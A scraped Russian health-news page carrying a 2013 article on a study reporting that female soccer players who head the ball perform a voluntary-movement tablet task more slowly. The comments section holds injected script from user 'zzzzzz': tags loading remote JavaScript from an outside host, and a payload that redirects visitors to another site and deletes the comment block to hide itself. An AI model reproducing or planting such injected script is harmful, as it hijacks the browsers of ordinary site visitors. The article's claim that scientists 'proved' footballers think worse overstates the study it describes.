Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  И было у нее три сына: од...  >>  И было у нее три сына: один – умный, второй – глупый, а третий – футболист!
 
Обратная связь
 

И было у нее три сына: один – умный, второй – глупый, а третий – футболист!

Размер шрифта
13 мая 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые доказали, что футболисты, которые бьют по мячу головой, соображают хуже, чем люди, которые не играют в футбол.

И было у нее три сына: один – умный, второй – глупый, а третий – футболист!

Ученые проанализировали, как удары по мячу головой влияют на мышление футболистов с помощью приложения на базе планшетного компьютера. Участники исследования видели цель на экране компьютера и двигались сначала от нее, а затем к ней. Оказалось, что женщины, которые играли в футбол, выполняли первое задание значительно медленнее, чем женщины, которые не играли в футбол. Что касается второго задания, то существенных различий между группами не наблюдалось.

Согласно данным исследования, при движении от цели необходимы особые произвольные реакции, тогда как движение в сторону цели является более рефлекторным. Ученые считают, что удары мячом по голове приводят к ухудшению определенных мыслительных процессов.

Авторы исследования считают, что приложение, которое оно использовали, можно использовать в качестве эффективного метода выявления и мониторирования изменения мыслительных процессов у спортсменов. Подобное приложение можно будет использовать как в лечебных учреждениях, так и в других условиях.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Родители стали хуже после падения Берлинской стены!   Когда папа может стать мамой?   Когда вы нервничаете, ваш ребенок толстеет   Флешмоб «Я в шаре» от «Подсолнуха»  
21 июня 2013Хочешь, чтобы у твоего ребенка не было аллергии, – пососи его соску! 02 мая 2013Чем мыть ребенка, чтобы не испортить его кожу
 
18 апреля 2013Не запрещайте ребенку играть в видеоигры, они лечат смертельные болезни 27 сентября 2012Дети наследуют дефекты в генах от отцов!
 

Слайдшоу

1
Первые шаги вашего малыша
Как научить ребенка есть правильно. Что можно и нельзя
Как правильно кормить грудью

Тесты

Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.